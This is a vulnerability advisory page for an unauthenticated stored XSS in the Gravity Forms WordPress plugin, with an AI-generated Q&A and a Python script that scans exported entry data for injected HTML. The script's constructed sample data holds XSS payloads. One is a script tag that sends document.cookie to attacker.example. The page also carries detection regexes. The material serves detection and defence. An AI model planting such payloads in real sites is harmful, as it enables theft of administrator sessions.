CVE-2026-5110
Deferred - Pending Action
Unauthenticated Stored XSS in Gravity Forms WordPress Plugin

Publication date: 2026-05-02

Last updated on: 2026-05-05

Assigner: Wordfence

Description
The Gravity Forms plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in versions up to and including 2.10.0. This is due to insufficient input validation and output escaping in the SingleProduct field when used inside a Repeater field. When SingleProduct fields are nested within Repeater fields, the validation flow bypasses the state validation mechanism (failed_state_validation()) that would normally prevent tampering with field values. The validate_subfield() method only calls the field's validate() method, which for SingleProduct fields only validates the quantity field and does not check the product name field for tampering. As a result, an attacker can inject arbitrary HTML and JavaScript into the product name field (input .1). This malicious input is then saved to the database without sanitization because sanitize_entry_value() returns raw values when HTML is not expected for the field type. When an administrator views the entry in wp-admin/admin.php?page=gf_entries, the get_value_entry_detail() method outputs the product name without escaping, causing the stored XSS payload to execute in the administrator's browser. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses an entry containing the malicious payload.
Meta Information
Generated: 2026-05-07
AI Q&A: 2026-05-02
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Vendor          Product         Version / Range
gravity_forms   gravity_forms   up to 2.10.0 (inclusive)
CWE ID   Description
CWE-79   The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Powered Q&A
Can you explain this vulnerability to me?

The Gravity Forms plugin for WordPress has a vulnerability called Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 2.10.0. This happens because the plugin does not properly validate and escape input in the SingleProduct field when it is used inside a Repeater field.

Specifically, when SingleProduct fields are nested within Repeater fields, the usual validation that prevents tampering is bypassed. The validation method only checks the quantity field but not the product name field, allowing an attacker to inject malicious HTML or JavaScript into the product name.

This malicious input is saved directly to the database without sanitization. When an administrator views the affected entry in the WordPress admin panel, the malicious script executes in their browser, potentially compromising their session or system.


How can this vulnerability impact me?

This vulnerability allows unauthenticated attackers to inject malicious scripts into Gravity Forms entries that execute in the browser of any administrator who views the entry.

The impact includes potential theft of administrator session cookies, unauthorized actions performed with administrator privileges, and possible compromise of the WordPress site or server.

Because the attack requires no authentication, anyone who can submit the public form can plant the payload; exploitation then only needs an administrator to open the affected entry in the entries screen, which is routine work for a site owner.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows unauthenticated attackers to inject arbitrary HTML and JavaScript into the product name field, which is then stored in the database and executed in an administrator's browser. This stored cross-site scripting (XSS) flaw can lead to unauthorized access or manipulation of administrative functions and potentially sensitive data.

Such unauthorized script execution and potential data exposure could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and ensure data integrity and confidentiality.

The advisory itself does not discuss compliance impacts or specific regulatory considerations; the points above follow from the nature of the flaw, not from anything the advisory states.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability involves unauthenticated stored cross-site scripting in the Gravity Forms WordPress plugin versions up to 2.10.0, specifically in the SingleProduct field nested inside a Repeater field. Detection would involve identifying if your WordPress installation is running a vulnerable version of the Gravity Forms plugin and checking for suspicious or malicious input in the SingleProduct fields within entries.

Since the vulnerability is triggered when an administrator views an entry containing malicious payloads in wp-admin, detection on the system could include reviewing database entries for unexpected HTML or JavaScript in product name fields of Gravity Forms entries.

The advisory itself provides no detection commands or signatures. In practice this comes down to two checks: confirm the installed plugin version from the plugin header, and review stored entry values (in particular product name sub-inputs, the .1 inputs) for HTML tags, inline event handlers or javascript: URLs, including values inside Repeater rows.
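The following is an added example, written for this page; it is not Gravity Forms, WordPress or Wordfence code and the advisory does not ship any detection logic. It assumes (as for any WordPress plugin) that the plugin header at wp-content/plugins/gravityforms/gravityforms.php carries a "Version:" line, and that entry values can be exported as (entry_id, form_id, meta_key, meta_value) rows from the wp_gf_entry_meta table; the table prefix and the exact way Repeater rows are stored (flat keys or a JSON document under the Repeater field id) are assumptions, so the scanner handles both layouts. The sample header and rows are constructed, not captured from a real site.

```python
"""Heuristic triage for CVE-2026-5110 in exported Gravity Forms entry data.

Added example; not project code. Assumptions (not from the advisory):
  * plugin header has a "Version:" line (standard WordPress plugin header);
  * rows come from wp_gf_entry_meta as (entry_id, form_id, meta_key, meta_value);
  * Repeater rows may be stored either as flat keys or as JSON, so both are walked.
"""
import json
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Versions up to and including 2.10.0 are affected (from the advisory).
LAST_VULNERABLE = (2, 10, 0)

# What an attacker would plant in a product name (input .1): a real tag,
# an inline event handler, or a javascript: URL.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I)
EVENT_RE = re.compile(r"\bon[a-z]+\s*=", re.I)
SCHEME_RE = re.compile(r"javascript\s*:", re.I)


def read_plugin_version(plugin_header: str) -> Optional[str]:
    """Pull the Version: value out of a WordPress plugin header block."""
    m = re.search(r"^\s*\*?\s*Version:\s*([0-9][0-9A-Za-z.\-]*)", plugin_header, re.M)
    return m.group(1) if m else None


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.10.0' -> (2, 10, 0); a pre-release suffix after '-' is ignored."""
    parts = tuple(int(n) for n in re.findall(r"\d+", version.split("-")[0]))
    return (parts + (0, 0, 0))[:3]


def is_vulnerable_version(version: str) -> bool:
    return parse_version(version) <= LAST_VULNERABLE


def looks_like_payload(value: str) -> bool:
    return any(p.search(value) for p in (TAG_RE, EVENT_RE, SCHEME_RE))


def _walk(value, path: str, hits: List[Dict], ctx: Dict) -> None:
    """Recurse through JSON-decoded Repeater rows and flag suspicious strings."""
    if isinstance(value, dict):
        for k, v in value.items():
            _walk(v, f"{path}.{k}", hits, ctx)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            _walk(v, f"{path}[{i}]", hits, ctx)
    elif isinstance(value, str) and looks_like_payload(value):
        hits.append({**ctx, "path": path, "snippet": value[:80]})


def scan_entries(rows: Iterable[Tuple[int, int, str, str]]) -> List[Dict]:
    """Return one record per suspicious value found in exported entry meta."""
    hits: List[Dict] = []
    for entry_id, form_id, meta_key, meta_value in rows:
        ctx = {"entry_id": entry_id, "form_id": form_id, "meta_key": meta_key}
        decoded = meta_value
        if meta_value.lstrip().startswith(("[", "{")):
            try:
                decoded = json.loads(meta_value)  # Repeater rows stored as JSON
            except ValueError:
                decoded = meta_value              # plain text that merely starts with [ or {
        _walk(decoded, meta_key, hits, ctx)
    return hits


# Constructed sample data (not captured from a real site).
SAMPLE_HEADER = """<?php
/*
Plugin Name: Gravity Forms
Version: 2.10.0
*/
"""

SAMPLE_ROWS = [
    (101, 3, "4.1", "Standard widget"),                       # benign product name
    (101, 3, "4.3", "1"),                                     # quantity sub-input
    (102, 3, "7", '[{"8.1": "<img src=x onerror=alert(document.cookie)>", "8.3": "2"},'
                  ' {"8.1": "Plain row", "8.3": "1"}]'),      # Repeater with one tampered row
    (103, 3, "4.1", "I <3 this mug (2 for 1)"),               # a '<' that is not a tag
    (104, 3, "4.1", "<script>fetch('https://attacker.example/?c='+document.cookie)</script>"),
]

if __name__ == "__main__":
    ver = read_plugin_version(SAMPLE_HEADER)
    state = "VULNERABLE" if ver and is_vulnerable_version(ver) else "not affected"
    print(f"Gravity Forms {ver}: {state}")
    for hit in scan_entries(SAMPLE_ROWS):
        print(f"entry {hit['entry_id']} form {hit['form_id']} {hit['path']}: {hit['snippet']}")
```

On a real site, feed read_plugin_version() the contents of gravityforms.php and scan_entries() the rows of the entry meta table (with whatever table prefix the site uses). The regexes are deliberately loose: they are a triage filter, so expect to review the hits by hand, and treat a hit in a .1 sub-input of a product field as the pattern described in the advisory. Do not open flagged entries in the wp-admin entries screen from a privileged session until the plugin has been updated, since viewing the entry is what triggers the payload.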


What immediate steps should I take to mitigate this vulnerability?

The vulnerability affects Gravity Forms plugin versions up to and including 2.10.0. Immediate mitigation is to update the Gravity Forms plugin to a version later than 2.10.0 in which this vulnerability is fixed.

Since the vulnerability allows unauthenticated stored cross-site scripting via the SingleProduct field inside Repeater fields, applying the update is critical to stop attackers from injecting scripts that execute in administrator browsers. Updating does not remove payloads that were already submitted to a vulnerable version, so entries received before the update should be reviewed for injected HTML before administrators open them in the entries screen.

